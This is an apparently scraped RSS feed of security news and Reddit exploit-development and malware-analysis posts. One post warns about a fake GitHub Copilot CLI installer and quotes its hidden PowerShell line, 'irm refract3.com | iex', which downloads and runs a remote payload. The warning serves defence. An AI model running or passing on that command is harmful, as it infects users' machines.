<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ShufflinMuffin"> /u/ShufflinMuffin </a> <br> <span><a href="https://davidcarliez.github.io/blog/windows-appresolver-lpe-to-system/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uz7ttt/windows_appresolver_lpe_from_appcontainer_to/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Automated reverse engineering of Android apps]]></title>
<description><![CDATA[submitted by    /u/No_Distribution_9182   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685136/it+sicherheit/malware+trojaner+viren/automated+reverse+engineering+of+android+apps/</link>
<pubDate>Wed, 22 Jul 2026 04:37:11 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uzsnhm/automated_reverse_engineering_of_android_apps/"> <img src="https://external-preview.redd.it/g977uXYInKD23Xjl27a5s3GeFazoeNMBy1JqoLDcHGU.jpeg?width=320&amp;crop=smart&amp;auto=webp&amp;s=c07e019c3a043a3a1c347500915c8f13de0caf1e" alt="Automated reverse engineering of Android apps" title="Automated reverse engineering of Android apps"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/No_Distribution_9182"> /u/No_Distribution_9182 </a> <br> <span><a href="https://www.youtube.com/watch?v=p9NTkIKlbxI&amp;t=32s">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uzsnhm/automated_reverse_engineering_of_android_apps/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[How can I reverse engineer this Samsung AC remote?]]></title>
<description><![CDATA[I would be happy if you provided me with a debugging interface. AI-generated submissions are not allowed.     submitted by    /u/samaxidervish   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685135/it+sicherheit/malware+trojaner+viren/how+can+i+reverse+engineer+this+samsung+ac+remote/</link>
<pubDate>Wed, 22 Jul 2026 04:37:10 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1v052j6/how_can_i_reverse_engineer_this_samsung_ac_remote/"> <img src="https://preview.redd.it/8ptpmg0mi1eh1.jpeg?width=640&amp;crop=smart&amp;auto=webp&amp;s=159dd2ef73f00d77d100c581c198fc527cc65ed6" alt="How can I reverse engineer this Samsung AC remote?" title="How can I reverse engineer this Samsung AC remote?"> </a> </td><td> <!-- SC_OFF --><div class="md"><p><strong>I would be happy if you provided me with a debugging interface. AI-generated submissions are not allowed.</strong> </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/samaxidervish"> /u/samaxidervish </a> <br> <span><a href="https://i.redd.it/8ptpmg0mi1eh1.jpeg">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v052j6/how_can_i_reverse_engineer_this_samsung_ac_remote/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Half a Second: a free, fully-sourced reconstruction of the xz-utils backdoor (CVE-2024-3094)]]></title>
<description><![CDATA[submitted by    /u/Final-Raspberry6442   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685134/it+sicherheit/malware+trojaner+viren/half+a+second+a+free+fully-sourced+reconstruction+of+the+xz-utils+backdoor+cve-2024-3094/</link>
<pubDate>Wed, 22 Jul 2026 04:37:09 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/Final-Raspberry6442"> /u/Final-Raspberry6442 </a> <br> <span><a href="https://www.half-second.com/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v0p18o/half_a_second_a_free_fullysourced_reconstruction/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[full chain to RCE or only bufferoverflow?]]></title>
<description><![CDATA[if you want report buffer overflow vulnerability do u need full chain to exploit or just report the crash with the corpus    submitted by    /u/False-Seesaw-1899   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685133/it+sicherheit/malware+trojaner+viren/full+chain+to+rce+or+only+bufferoverflow/</link>
<pubDate>Wed, 22 Jul 2026 04:37:08 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>if you want report buffer overflow vulnerability do u need full chain to exploit or just report the crash with the corpus</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/False-Seesaw-1899"> /u/False-Seesaw-1899 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v1if5p/full_chain_to_rce_or_only_bufferoverflow/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v1if5p/full_chain_to_rce_or_only_bufferoverflow/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Post-Compilation Obfuscation Is Outdated: Moving Polymorphism Directly into CMake]]></title>
<description><![CDATA[submitted by    /u/Important_Map6928   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685132/it+sicherheit/malware+trojaner+viren/post-compilation+obfuscation+is+outdated+moving+polymorphism+directly+into+cmake/</link>
<pubDate>Wed, 22 Jul 2026 04:37:06 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1v1qki3/postcompilation_obfuscation_is_outdated_moving/"> <img src="https://external-preview.redd.it/BbjX-8z19KBq6iARhw-ps6PfvT-upjh81mG3HJoFyYQ.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=d084b6856ff66f8d9c04d724ddabea3e96b0f48e" alt="Post-Compilation Obfuscation Is Outdated: Moving Polymorphism Directly into CMake" title="Post-Compilation Obfuscation Is Outdated: Moving Polymorphism Directly into CMake"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Important_Map6928"> /u/Important_Map6928 </a> <br> <span><a href="https://sibouzitoun.tech/articles/sindrikit-v1o5/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v1qki3/postcompilation_obfuscation_is_outdated_moving/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[TruthSocial are selling their API - want it for free?]]></title>
<description><![CDATA[So, he's selling access to the "upcoming" official API. I didn't want to provide my mobile number to sign up, and the huge number of ads was pissing me off, so I dug around and found the API, which they're claiming doesn't exist:   (source: https://s3.amazonaws.com/b2icontent.irpass.cc/2660/rl168...]]></description>
<link>https://tsecurity.de/de/3685131/it+sicherheit/malware+trojaner+viren/truthsocial+are+selling+their+api+-+want+it+for+free/</link>
<pubDate>Wed, 22 Jul 2026 04:37:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1v20jw0/truthsocial_are_selling_their_api_want_it_for_free/"> <img src="https://preview.redd.it/xpg5ok01rgeh1.png?width=140&amp;height=88&amp;auto=webp&amp;s=e2e87326f9e77cdcc4b9d67282611a8fe484f24e" alt="TruthSocial are selling their API - want it for free?" title="TruthSocial are selling their API - want it for free?"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>So, he's selling access to the "upcoming" official API. I didn't want to provide my mobile number to sign up, and the huge number of ads was pissing me off, so I dug around and found the API, which they're claiming doesn't exist:</p> <blockquote> </blockquote> <p>(source: <a href="https://s3.amazonaws.com/b2icontent.irpass.cc/2660/rl168199.pdf">https://s3.amazonaws.com/b2icontent.irpass.cc/2660/rl168199.pdf</a> )</p> <p>I had a feeling that there would be something to find if I kept digging. I found the Trump Mobile leak, and in comparison, finding this was easy!</p> <p>A few examples:</p> <p>Trump's: <a href="https://truthsocial.com/api/v1/accounts/107780257626128497/statuses?exclude_replies=true">https://truthsocial.com/api/v1/accounts/107780257626128497/statuses?exclude_replies=true</a></p> <p>White house's: <a href="https://truthsocial.com/api/v1/accounts/113686491998750334/statuses?exclude_replies=true">https://truthsocial.com/api/v1/accounts/113686491998750334/statuses?exclude_replies=true</a></p> <p>The Trump Organization: <a href="https://truthsocial.com/api/v1/accounts/108126733623665147/statuses?exclude_replies=true">https://truthsocial.com/api/v1/accounts/108126733623665147/statuses?exclude_replies=true</a></p> <p>I've already tipped off a few contacts at news outlets and a couple YouTubers in case anyone wants to look into it further and figured I want to spread word as much as possible, so here we are.</p> <p>Here's a Tampermonkey Userscript to add a button to all profiles which auto finds the account ID and copies the API URL for that account:</p> <pre><code>// ==UserScript== // Truth Social API URL Copy Button // trump-truth-site // 2.0 // Adds a button above the media grid on Truth Social profile pages that copies the statuses API URL for that account // UnusualTardigrade // https://truthsocial.com/@* // none // document-idle // ==/UserScript== (function () { 'use strict'; console.log('[TS API Button] userscript loaded'); const BUTTON_ID = 'ts-api-copy-btn'; // The media grid on a profile page. Button is inserted just above it. const GRID_SELECTOR = '.grid.grid-cols-3.gap-1.rounded-lg'; let lastUsername = null; let currentAccountId = null; let buttonEl = null; function getUsernameFromUrl() { const m = location.pathname.match(/^\/@([^/]+)/); return m ? m[1] : null; } function buildStatusesUrl(id) { return `https://truthsocial.com/api/v1/accounts/${id}/statuses?exclude_replies=true`; } function ensureButton() { if (buttonEl) return buttonEl; const btn = document.createElement('button'); btn.id = BUTTON_ID; btn.textContent = 'Copy API URL'; Object.assign(btn.style, { display: 'block', width: '100%', boxSizing: 'border-box', margin: '0 0 8px 0', padding: '10px 16px', background: '#ff4d4d', color: '#fff', border: 'none', borderRadius: '8px', fontSize: '14px', fontWeight: '600', fontFamily: 'system-ui, sans-serif', cursor: 'pointer', boxShadow: '0 1px 3px rgba(0,0,0,0.2)', opacity: '0.95', transition: 'opacity 0.15s, background 0.15s', }); btn.disabled = true; btn.addEventListener('mouseenter', () =&gt; { if (!btn.disabled) btn.style.opacity = '1'; }); btn.addEventListener('mouseleave', () =&gt; { if (!btn.disabled) btn.style.opacity = '0.85'; }); btn.addEventListener('click', async () =&gt; { if (!currentAccountId) return; const url = buildStatusesUrl(currentAccountId); try { await navigator.clipboard.writeText(url); flashButton(btn, 'Copied!', '#2ecc71'); } catch (e) { // Fallback for contexts where clipboard API is blocked const ta = document.createElement('textarea'); ta.value = url; ta.style.position = 'fixed'; ta.style.opacity = '0'; document.body.appendChild(ta); ta.select(); document.execCommand('copy'); document.body.removeChild(ta); flashButton(btn, 'Copied!', '#2ecc71'); } }); buttonEl = btn; return btn; } function applyInlineStyle(btn) { Object.assign(btn.style, { position: 'static', top: '', right: '', bottom: '', left: '', zIndex: '', display: 'block', width: '100%', margin: '0 0 8px 0', borderRadius: '8px', boxShadow: '0 1px 3px rgba(0,0,0,0.2)', }); } function applyFixedStyle(btn) { Object.assign(btn.style, { position: 'fixed', top: '80px', right: '24px', left: '', bottom: '', zIndex: '2147483647', display: 'block', width: 'auto', margin: '0', borderRadius: '999px', boxShadow: '0 2px 8px rgba(0,0,0,0.3)', }); } function placeButton(btn) { const grid = document.querySelector(GRID_SELECTOR); if (grid) { const wrapper = grid.parentElement || grid; if (wrapper.previousElementSibling !== btn) { applyInlineStyle(btn); wrapper.parentNode.insertBefore(btn, wrapper); } return; } if (btn.parentElement !== document.body) { applyFixedStyle(btn); document.body.appendChild(btn); } } function flashButton(btn, text, color) { const prevText = btn.textContent; const prevBg = btn.style.background; btn.textContent = text; btn.style.background = color; setTimeout(() =&gt; { btn.textContent = prevText; btn.style.background = prevBg; }, 1200); } function setButtonState(btn, { loading, id, username }) { if (loading) { btn.disabled = true; btn.style.opacity = '0.5'; btn.textContent = 'Loading ID…'; } else if (id) { btn.disabled = false; btn.style.opacity = '0.85'; btn.style.background = '#ff4d4d'; btn.textContent = `Copy API URL (@${username})`; } else { btn.disabled = true; btn.style.opacity = '0.5'; btn.textContent = 'No account found'; } } function fetchAccountId(username) { const btn = ensureButton(); setButtonState(btn, { loading: true }); currentAccountId = null; fetch(`https://truthsocial.com/api/v1/accounts/lookup?acct=${encodeURIComponent(username)}`, { credentials: 'include', }) .then((res) =&gt; (res.ok ? res.json() : Promise.reject(res.status))) .then((data) =&gt; { if (getUsernameFromUrl() !== username) return; currentAccountId = data.id; setButtonState(btn, { loading: false, id: data.id, username: data.username }); }) .catch(() =&gt; { if (getUsernameFromUrl() !== username) return; setButtonState(btn, { loading: false, id: null }); }); } function checkForUsernameChange() { const username = getUsernameFromUrl(); if (!username) { if (buttonEl) buttonEl.remove(); lastUsername = null; return; } if (username !== lastUsername) { lastUsername = username; fetchAccountId(username); } } function tick() { checkForUsernameChange(); if (buttonEl &amp;&amp; getUsernameFromUrl()) placeButton(buttonEl); } const origPushState = history.pushState; const origReplaceState = history.replaceState; history.pushState = function (...args) { origPushState.apply(this, args); setTimeout(tick, 0); }; history.replaceState = function (...args) { origReplaceState.apply(this, args); setTimeout(tick, 0); }; window.addEventListener('popstate', () =&gt; setTimeout(tick, 0)); setInterval(tick, 1000); tick(); })(); </code></pre> <p>The data downloaded as JSON:</p> <p><a href="https://preview.redd.it/xpg5ok01rgeh1.png?width=2017&amp;format=png&amp;auto=webp&amp;s=a9ef57711b0046501c36ad2b3dec16792896f9e2">https://preview.redd.it/xpg5ok01rgeh1.png?width=2017&amp;format=png&amp;auto=webp&amp;s=a9ef57711b0046501c36ad2b3dec16792896f9e2</a></p> <p>I think that's all. Any questions, lemme know! Enjoy</p> <p><a href="https://www.reddit.com/submit/?source_id=t3_1v0ux1d&amp;composer_entry=crosspost_prompt"></a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/UnusualTardigrade"> /u/UnusualTardigrade </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v20jw0/truthsocial_are_selling_their_api_want_it_for_free/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v20jw0/truthsocial_are_selling_their_api_want_it_for_free/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[A method to statically extract the raw .py source code directly from PyArmor.]]></title>
<description><![CDATA[I have already used memory dumps and runtime hooks, injecting a trace script directly into the start-up routing of the malware payload but that only captures the components that I am looking out for. Suggestions to get the entire thing decrypted back to .pyc. i can take it from there.    submitte...]]></description>
<link>https://tsecurity.de/de/3685130/it+sicherheit/malware+trojaner+viren/a+method+to+statically+extract+the+raw+py+source+code+directly+from+pyarmor/</link>
<pubDate>Wed, 22 Jul 2026 04:37:04 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have already used memory dumps and runtime hooks, injecting a trace script directly into the start-up routing of the malware payload but that only captures the components that I am looking out for. Suggestions to get the entire thing decrypted back to .pyc. i can take it from there.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/fonzhy121"> /u/fonzhy121 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v2jmf4/a_method_to_statically_extract_the_raw_py_source/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v2jmf4/a_method_to_statically_extract_the_raw_py_source/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Game Cheat Dev]]></title>
<description><![CDATA[Anyone have contacts to Devs who make cheats for games.     submitted by    /u/Maximum-Stick-5080   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685129/it+sicherheit/malware+trojaner+viren/game+cheat+dev/</link>
<pubDate>Wed, 22 Jul 2026 04:37:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Anyone have contacts to Devs who make cheats for games. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Maximum-Stick-5080"> /u/Maximum-Stick-5080 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v2xtw9/game_cheat_dev/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v2xtw9/game_cheat_dev/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub - NtProtectVirtualMemory/PE-Library: A modern C++ library for parsing and manipulating Windows Portable Executable (PE) files.]]></title>
<description><![CDATA[submitted by    /u/Effective-Fly7516   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685128/it+sicherheit/malware+trojaner+viren/github+-+ntprotectvirtualmemorype-library+a+modern+c+library+for+parsing+and+manipulating+windows+portable+executable+pe+files/</link>
<pubDate>Wed, 22 Jul 2026 04:37:01 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1v30o00/github_ntprotectvirtualmemorypelibrary_a_modern_c/"> <img src="https://external-preview.redd.it/hlvU_mXTfqRzjVVNb9juAaoeXWR5Ae132krSoaNb9_A.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=ca00bb123e0350f8fe4a07fab28267f27a4efaea" alt="GitHub - NtProtectVirtualMemory/PE-Library: A modern C++ library for parsing and manipulating Windows Portable Executable (PE) files." title="GitHub - NtProtectVirtualMemory/PE-Library: A modern C++ library for parsing and manipulating Windows Portable Executable (PE) files."> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Effective-Fly7516"> /u/Effective-Fly7516 </a> <br> <span><a href="https://github.com/NtProtectVirtualMemory/PE-Library">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1v30o00/github_ntprotectvirtualmemorypelibrary_a_modern_c/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to get old malicious package]]></title>
<description><![CDATA[I want to analyse npm packages that are malicious. How do I get those old packages? They are all taken down. And webarchive doesn’t have it.    submitted by    /u/Tasty_Medium_5312   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685097/it+sicherheit/malware+trojaner+viren/how+to+get+old+malicious+package/</link>
<pubDate>Wed, 22 Jul 2026 04:03:56 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I want to analyse npm packages that are malicious. How do I get those old packages? They are all taken down. And webarchive doesn’t have it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Tasty_Medium_5312"> /u/Tasty_Medium_5312 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v286hq/how_to_get_old_malicious_package/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v286hq/how_to_get_old_malicious_package/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Odyssee: Hacker verbreiten über angebliche Kopien ihre Schadsoftware]]></title>
<description><![CDATA[Die illegale Verbreitung von Christopher Nolans IMAX-Abenteuer "Die Odyssee" nutzen Cyberkriminelle für ihre Zwecke aus.
Der Artikel Die Odyssee: Hacker verbreiten über angebliche Kopien ihre Schadsoftware erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3684643/it+sicherheit/malware+trojaner+viren/die+odyssee+hacker+verbreiten+ueber+angebliche+kopien+ihre+schadsoftware/</link>
<pubDate>Tue, 21 Jul 2026 20:49:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Die illegale Verbreitung von Christopher Nolans IMAX-Abenteuer "Die Odyssee" nutzen Cyberkriminelle für ihre Zwecke aus.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/cyberangriffe/die-odyssee-hacker-verbreiten-ueber-angebliche-kopien-ihre-schadsoftware-331662.html">Die Odyssee: Hacker verbreiten über angebliche Kopien ihre Schadsoftware</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A new extortion cocktail: office printers, small ransoms, and BitLocker]]></title>
<description><![CDATA[We cover two recent cases of BitLocker extortion using RDP, MSSQL, RMM tools, web shells, and printers. The story includes TTPs and recommendations.]]></description>
<link>https://tsecurity.de/de/3683802/it+sicherheit/malware+trojaner+viren/a+new+extortion+cocktail+office+printers+small+ransoms+and+bitlocker/</link>
<pubDate>Tue, 21 Jul 2026 15:19:46 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We cover two recent cases of BitLocker extortion using RDP, MSSQL, RMM tools, web shells, and printers. The story includes TTPs and recommendations.]]></content:encoded>
</item>
<item>
<title><![CDATA[ClaudeFix: Shared Claude Chats Meet ClickFix]]></title>
<description><![CDATA[2026-07-15 • Zscaler
     • Ruchna Nigam
     • osx.macsync
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3683379/it+sicherheit/malware+trojaner+viren/claudefix+shared+claude+chats+meet+clickfix/</link>
<pubDate>Tue, 21 Jul 2026 12:33:23 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-15 • Zscaler
     • Ruchna Nigam
     • osx.macsync
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/6ddef08b-ace8-4b93-85c1-4a3ac358e916/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Turb00 — Part 3: Unmasking the SnappyClient RAT]]></title>
<description><![CDATA[2026-07-02 • Mrtiepolo
     • Gianluca Tiepolo
     • win.hijackloader, win.snappy_client
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3683120/it+sicherheit/malware+trojaner+viren/operation+turb00+-+part+3+unmasking+the+snappyclient+rat/</link>
<pubDate>Tue, 21 Jul 2026 11:04:40 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-02 • Mrtiepolo
     • Gianluca Tiepolo
     • win.hijackloader, win.snappy_client
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/bf195447-cc17-4d5d-b676-d30e7844b8fe/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SnappyClient Analysis]]></title>
<description><![CDATA[2026-07-21 • ANY.RUN
     • ANY.RUN
     • win.snappy_client
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3683119/it+sicherheit/malware+trojaner+viren/snappyclient+analysis/</link>
<pubDate>Tue, 21 Jul 2026 11:04:39 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-21 • ANY.RUN
     • ANY.RUN
     • win.snappy_client
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/414af7a9-920a-48e5-a03f-ad057b9b2e3d/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hero Deal: hide.me senkt erneut die Preise!]]></title>
<description><![CDATA[Beim Hero Deal kann man wieder viel Geld sparen. Wir bieten euch 27 Monate hide.me VPN für nur € 2,59 netto monatlich an, jetzt zuschlagen!
Der Artikel Hero Deal: hide.me senkt erneut die Preise! erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3682967/it+sicherheit/malware+trojaner+viren/hero+deal+hideme+senkt+erneut+die+preise/</link>
<pubDate>Tue, 21 Jul 2026 10:03:57 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Beim Hero Deal kann man wieder viel Geld sparen. Wir bieten euch 27 Monate hide.me VPN für nur € 2,59 netto monatlich an, jetzt zuschlagen!</p>
<p>Der Artikel <a href="https://tarnkappe.info/advertorial/hero-deal-hide-me-senkt-erneut-die-preise-331653.html">Hero Deal: hide.me senkt erneut die Preise!</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Github copilot CLI installer trojan]]></title>
<description><![CDATA[The following website is mimicking the official Github copilot CLI website.  https://copilotcli[.]co[.]com/  The install script first downloads and executes a malicious payload before continuing installing the legit copilot CLI  $GhCop = New-Object -ComObject "Shell.Application"; $GhCop.ShellExec...]]></description>
<link>https://tsecurity.de/de/3682528/it+sicherheit/malware+trojaner+viren/fake+github+copilot+cli+installer+trojan/</link>
<pubDate>Tue, 21 Jul 2026 04:02:54 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>The following website is mimicking the official Github copilot CLI website.</p> <p><code> https://copilotcli[.]co[.]com/ </code></p> <p>The install script first downloads and executes a malicious payload before continuing installing the legit copilot CLI</p> <p><code> $GhCop = New-Object -ComObject "Shell.Application"; $GhCop.ShellExecute("powershell", '"irm refract3.com | iex"', $null, "open", 0); winget install GitHub.Copilot </code></p> <p>Luckily windows security blocked the payload which was detected as <code>Trojan:Win32/ClickFix.Q!ml</code></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/reamplumbera"> /u/reamplumbera </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v1n3nx/fake_github_copilot_cli_installer_trojan/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v1n3nx/fake_github_copilot_cli_installer_trojan/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Merch Scams]]></title>
<description><![CDATA[Author: Avast - Bewertung: 0x - Views:35 Used to each cycle moving at the speed of hype? Don’t crash and burn 🚲]]></description>
<link>https://tsecurity.de/de/3682260/it+sicherheit/malware+trojaner+viren/merch+scams/</link>
<pubDate>Tue, 21 Jul 2026 00:02:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 0x - Views:35 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/K0lharTKVHk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Used to each cycle moving at the speed of hype? Don’t crash and burn 🚲<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Avast One: One App for Security, Privacy & Performance]]></title>
<description><![CDATA[Author: Avast - Bewertung: 2x - Views:4 Your digital life is complicated enough — your protection shouldn't be. 

Avast One is an all-in-one app that brings together everything you need to stay safe, private, and running smoothly online. No more juggling separate apps, overlapping tools, or rigid...]]></description>
<link>https://tsecurity.de/de/3682212/it+sicherheit/malware+trojaner+viren/avast+one+one+app+for+security+privacy+performance/</link>
<pubDate>Mon, 20 Jul 2026 23:36:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Avast - Bewertung: 2x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/OINVL4fGpSY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Your digital life is complicated enough — your protection shouldn't be. <br />
<br />
Avast One is an all-in-one app that brings together everything you need to stay safe, private, and running smoothly online. No more juggling separate apps, overlapping tools, or rigid bundles. Just one clean dashboard, one smart app, and full control over what protects you. <br />
<br />
Here's what's inside Avast One: ✔ Advanced antivirus & real-time threat detection ✔ AI-powered scam protection that spots suspicious links before you click ✔ A VPN that encrypts your connection and hides your IP address ✔ Device cleanup tools to clear junk and speed things up ✔ Identity monitoring to check for your info on the dark web <br />
<br />
Start with award-winning free antivirus — then add only the modules you actually need, when you need them. Available on Windows, Mac, Android, and iOS. <br />
<br />
Because staying protected shouldn't feel like a second job. <br />
<br />
🔒 Download Avast One free today → avast.com <br />
<br />
#AvastOne #Avast #CyberSecurity #OnlineSafety #DigitalPrivacy #AntiVirus #VPN #ScamProtection #MalwareProtection #InternetSecurity #PrivacyProtection #CyberProtection #TechTips #DigitalSecurity #FreeAntivirus <br />
<br />
 Follow us: <br />
<br />
YouTube @Avast <br />
Instagram @AvastOfficial <br />
Facebook @Avast <br />
TikTok @Avast<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gaming: Wie das Pay2win-Konzept gute Spiele kaputtmachen kann]]></title>
<description><![CDATA[Ist Free to Play am Ende? Mit neuen Tricks versuchen Anbieter mehr Geld zu verdienen. Dieser Gastbeitrag beleuchtet das Pay2win-Konzept.
Der Artikel Gaming: Wie das Pay2win-Konzept gute Spiele kaputtmachen kann erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3681657/it+sicherheit/malware+trojaner+viren/gaming+wie+das+pay2win-konzept+gute+spiele+kaputtmachen+kann/</link>
<pubDate>Mon, 20 Jul 2026 18:52:53 +0200</pubDate>
